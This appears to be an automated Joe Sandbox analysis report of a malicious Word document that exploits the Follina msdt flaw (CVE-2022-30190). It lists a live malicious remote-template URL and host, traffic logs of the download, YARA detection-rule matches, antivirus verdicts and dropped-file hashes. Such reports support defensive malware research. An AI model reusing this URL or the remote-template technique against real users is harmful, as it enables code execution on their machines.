      Source: global trafficHTTP traffic detected: GET /dir/info/priny/t.html HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: baza-novostei.nameConnection: Keep-Alive
      Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
      Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
      Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
      Source: unknownHTTPS traffic detected: 195.201.110.47:443 -> 192.168.2.22:49173 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 195.201.110.47:443 -> 192.168.2.22:49175 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 195.201.110.47:443 -> 192.168.2.22:49178 version: TLS 1.0
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49179
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49178
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49177
      Source: unknownNetwork traffic detected: HTTP traffic on port 49180 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49176
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49175
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49173
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49180
      Source: unknownNetwork traffic detected: HTTP traffic on port 49175 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49176 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49173 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49177 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49178 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49179 -> 443
      Source: ~WRF{FBAA5654-5D14-4878-BCFB-2CE5C11EE2EA}.tmp.0.drString found in binary or memory: http://baza-novostei.name/dir/info/priny/t.html
      Source: ~WRF{FBAA5654-5D14-4878-BCFB-2CE5C11EE2EA}.tmp.0.drString found in binary or memory: http://baza-novostei.name/dir/info/priny/t.htmlyX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{87D8FFE7-04E6-4C98-8E49-7EEE49FEBDC8}.tmpJump to behavior
      Source: unknownDNS traffic detected: queries for: baza-novostei.name
      Source: global trafficHTTP traffic detected: GET /dir/info/priny/t.html HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: baza-novostei.nameConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /dir/info/priny/t.html HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: baza-novostei.nameConnection: Keep-AliveIf-Modified-Since: Sun, 29 Jan 2023 13:29:26 GMTIf-None-Match: "63d674b6-18c0"
      Source: global trafficHTTP traffic detected: GET /dir/info/priny/t.html HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: baza-novostei.nameConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /dir/info/priny/t.html HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: baza-novostei.nameConnection: Keep-Alive
      Source: unknownHTTPS traffic detected: 195.201.110.47:443 -> 192.168.2.22:49176 version: TLS 1.2

      System Summary

      barindex
      Malicious sample detected (through community Yara rule)
      Source: document.xml.rels, type: SAMPLEMatched rule: Detects XML relations where an OLE object is refrencing an external target in dropper OOXML documents Author: ditekSHen
      Source: sslproxydump.pcap, type: PCAPMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
      Source: sslproxydump.pcap, type: PCAPMatched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18
      Source: document.xml.rels, type: SAMPLEMatched rule: SUSP_Doc_WordXMLRels_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, Wojciech Cieslak, description = Detects a suspicious pattern in docx document.xml.rels file as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-06-20, hash = 62f262d180a5a48f89be19369a8425bec596bc6a02ed23100424930791ae3df0
      Source: document.xml.rels, type: SAMPLEMatched rule: INDICATOR_OLE_RemoteTemplate author = ditekSHen, description = Detects XML relations where an OLE object is refrencing an external target in dropper OOXML documents
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\t[1].htm, type: DROPPEDMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\t[1].htm, type: DROPPEDMatched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F29C8AAB.htm, type: DROPPEDMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F29C8AAB.htm, type: DROPPEDMatched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B0C92CD5.htm, type: DROPPEDMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B0C92CD5.htm, type: DROPPEDMatched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18
      Source: ~WRF{FBAA5654-5D14-4878-BCFB-2CE5C11EE2EA}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
      Source: MuUeMZphCk.docxReversingLabs: Detection: 46%
      Source: MuUeMZphCk.docxVirustotal: Detection: 50%
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
      Source: MuUeMZphCk.LNK.0.drLNK file: ..\..\..\..\..\Desktop\MuUeMZphCk.docx
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$UeMZphCk.docxJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR5A4F.tmpJump to behavior
      Source: classification engineClassification label: mal96.expl.evad.winDOCX@1/20@7/1
      Source: ~WRF{FBAA5654-5D14-4878-BCFB-2CE5C11EE2EA}.tmp.0.drOLE document summary: title field not present or empty
      Source: ~WRF{FBAA5654-5D14-4878-BCFB-2CE5C11EE2EA}.tmp.0.drOLE document summary: author field not present or empty
      Source: ~WRF{FBAA5654-5D14-4878-BCFB-2CE5C11EE2EA}.tmp.0.drOLE document summary: edited time not present or 0
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
      Source: ~WRF{FBAA5654-5D14-4878-BCFB-2CE5C11EE2EA}.tmp.0.drInitial sample: OLE indicators vbamacros = False

      Persistence and Installation Behavior

      barindex
      Contains an external reference to another file
      Source: document.xml.relsExtracted files from sample: http://baza-novostei.name/dir/info/priny/t.html!
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid Accounts13
      Exploitation for Client Execution      		Path InterceptionPath Interception1
      Masquerading      		OS Credential Dumping1
      File and Directory Discovery      		Remote ServicesData from Local SystemExfiltration Over Other Network Medium1
      Encrypted Channel      		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS Memory2
      System Information Discovery      		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth2
      Non-Application Layer Protocol      		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration13
      Application Layer Protocol      		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled Transfer2
      Ingress Tool Transfer      		SIM Card SwapCarrier Billing Fraud

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      MuUeMZphCk.docx46%ReversingLabsDocument-Word.Exploit.CVE-2022-30190
      MuUeMZphCk.docx51%VirustotalBrowse
      MuUeMZphCk.docx100%AviraW97M/Dldr.Agent.G1

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\t[1].htm100%AviraJS/CVE-2022-30190.G
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F29C8AAB.htm100%AviraJS/CVE-2022-30190.G
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B0C92CD5.htm100%AviraJS/CVE-2022-30190.G

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      https://baza-novostei.name/dir/info/priny/t.html0%Avira URL Cloudsafe
      http://baza-novostei.name/dir/info/priny/t.htmlyX0%Avira URL Cloudsafe
      http://baza-novostei.name/dir/info/priny/t.html0%Avira URL Cloudsafe
      https://baza-novostei.name/dir/info/priny/t.html3%VirustotalBrowse
      http://baza-novostei.name/dir/info/priny/t.html0%VirustotalBrowse

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      baza-novostei.name
      		195.201.110.47
      		truetrue
        		unknown

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        https://baza-novostei.name/dir/info/priny/t.htmltrue
        • 3%, Virustotal, Browse
        • Avira URL Cloud: safe
        		unknown
        http://baza-novostei.name/dir/info/priny/t.htmltrue
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        		unknown

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        http://baza-novostei.name/dir/info/priny/t.htmlyX~WRF{FBAA5654-5D14-4878-BCFB-2CE5C11EE2EA}.tmp.0.drfalse
        • Avira URL Cloud: safe
        		unknown

        World Map of Contacted IPs

        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs

        Public IPs

        IPDomainCountryFlagASNASN NameMalicious
        195.201.110.47
        		baza-novostei.nameGermany
        		24940HETZNER-ASDEtrue

        General Information

        Joe Sandbox Version:36.0.0 Rainbow Opal
        Analysis ID:794514
        Start date and time:2023-01-30 16:38:00 +01:00
        Joe Sandbox Product:CloudBasic
        Overall analysis duration:0h 5m 14s
        Hypervisor based Inspection enabled:false
        Report type:light
        Cookbook file name:defaultwindowsofficecookbook.jbs
        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
        Number of analysed new started processes analysed:6
        Number of new started drivers analysed:1
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • HDC enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample file name:MuUeMZphCk.docx
        Detection:MAL
        Classification:mal96.expl.evad.winDOCX@1/20@7/1
        EGA Information:Failed
        HDC Information:Failed
        HCA Information:
        • Successful, ratio: 100%
        • Number of executed functions: 0
        • Number of non-executed functions: 0
        Cookbook Comments:
        • Found application associated with file extension: .docx
        • Found Word or Excel or PowerPoint or XPS Viewer
        • Attach to Office via COM
        • Scroll down
        • Close Viewer

        Warnings

        • Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe
        • TCP Packets have been reduced to 100
        • Report size getting too big, too many NtQueryAttributesFile calls found.

        Simulations

        Behavior and APIs

        No simulations

        Joe Sandbox View / Context

        IPs

        No context

        Domains

        No context

        ASNs

        No context

        JA3 Fingerprints

        No context

        Dropped Files

        No context

        Created / dropped Files

        C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-CNRY.FSD

        Download File
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):131072
        Entropy (8bit):0.28831879813621564
        Encrypted:false
        SSDEEP:96:KZLivvuJm3keI4sae13v9JvOvZeALMrgbHDrXJH/Xy329pkpBZcJvHa329pkpBZo:S4pOdvmRK4s4x
        MD5:DA62F69125924684FAA121DBB4DE4FC2
        SHA1:58CACD8128E436F9908644DD1BA81F0D16C30C8A
        SHA-256:13320D9D526F1D39E73C126AD3906F85B3E1554D04EE6D7901026CA129AE021C
        SHA-512:3066A9ECCD1E881A4CAEC41E34548A69B01F4536E4119A7C4FF2CEB51E7C26FBBAA80DC9566FC30FA9032182D91D5CB8BD8D82272DD15D0F8A5A7C2E9B50A391
        Malicious:false
        Reputation:low
        Preview:......M.eFy...z2.q.3.+C.F....e.S,...X.F...Fa.q...............................U.RiF.-..O.............{..a@.`..7....A...................................E...............................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G.........J..R.w.ps............................................................................................................................................................................................................................................................................................................................................................................................................................

        C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{74303997-B657-49E3-86A3-CDB672B97C40}.FSD

        Download File
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):131072
        Entropy (8bit):0.6723917104927228
        Encrypted:false
        SSDEEP:96:KACy8ohW4YPse21a5clDIVaoGjmmoEbAUoEbAOv52klKcEmA3ot5AA0bPn33//9n:PRhlYPse9KyV/GVRDRH52khWEYf9
        MD5:5D3DB6D5B5E852B5E80860BF6C58C559
        SHA1:302701752ED873B41D65156F690F837CF282F21E
        SHA-256:42EBD2452242BBB9053666C9886A5154DE7AB0BD89060E96ECDF32268566A8FC
        SHA-512:ACA8DA284F967D161A2F39823694C7D7F5A60AEDA93E149428ABBCE2BD91085164232EDD15D081AF3E449A90128C2EDB90E480990D90B95437DF86479B6C8C31
        Malicious:false
        Reputation:low
        Preview:......M.eFy...zK...I..O.L....4.S,...X.F...Fa.q...............................{D;.N.[...h.w........}.w.@..H...y..i..S...................................W...............................x...x...x...x..*............................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G.....5.2A....................................................................................................................................................................................................................................................................................................................................................................................................................................

        C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSF-CTBL.FSF

        Download File
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):114
        Entropy (8bit):3.961797847617582
        Encrypted:false
        SSDEEP:3:yVlgsRlz8UW9HTXYD7WclkkLxHmRjl276:yPblzVW9k+UkqcRZ22
        MD5:CC66ED109FF8BF7F936B0164A1E2984F
        SHA1:789E0409A59BBD55E0A1BFEB522BA1B049D87A79
        SHA-256:14F8B6013287B8AA0E919902E41D30115F915BF846F5ADCCC9D84F84BACC1E13
        SHA-512:7C189C603BF1B94EABA9D9F8360D589EC4DFE283BB1E7ADC170E02A6368F3E2E7052C44E34122364C6932F8B825BA3D4D5F8F3698084ECE6F66D160B0E49C563
        Malicious:false
        Reputation:low
        Preview:..H..@....b..q....]F.S.D.-.{.7.4.3.0.3.9.9.7.-.B.6.5.7.-.4.9.E.3.-.8.6.A.3.-.C.D.B.6.7.2.B.9.7.C.4.0.}...F.S.D..

        C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

        Download File
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):131072
        Entropy (8bit):0.28788979401335124
        Encrypted:false
        SSDEEP:48:I30fRBeLt97J5ltcMd56YKxwXPdlbxch7ruD52OjT456ivqB456ivq5H:K0fLg7jjqwXlNylITVmyVmuH
        MD5:698E6185D766EEAF0AA6306D4C2EA62A
        SHA1:E8D99C070FB24914A9CBE59C5758C267B5182687
        SHA-256:93B45BDED2216BAE615D02806108C2B64D4DC86B7F3CFA05E14105DF0BE7CF7C
        SHA-512:6C1A102BA7D608392CFCEE100C5D1AC5F450FBE8D62749B6348646F4E1829E43C0DA2A4722DA2518A1B930CBB25A054B656C48F06B83F474A6B8A32312B1595D
        Malicious:false
        Reputation:low
        Preview:......M.eFy...z(...f.7H....|...S,...X.F...Fa.q..............................&..qoH.Jw(.R.........3'....@J.mH0.z...A...................................E...............................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G.........J..R.w.ps............................................................................................................................................................................................................................................................................................................................................................................................................................

        C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{DAAEA1DB-A9D3-4BCE-A00E-241717FE421B}.FSD

        Download File
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
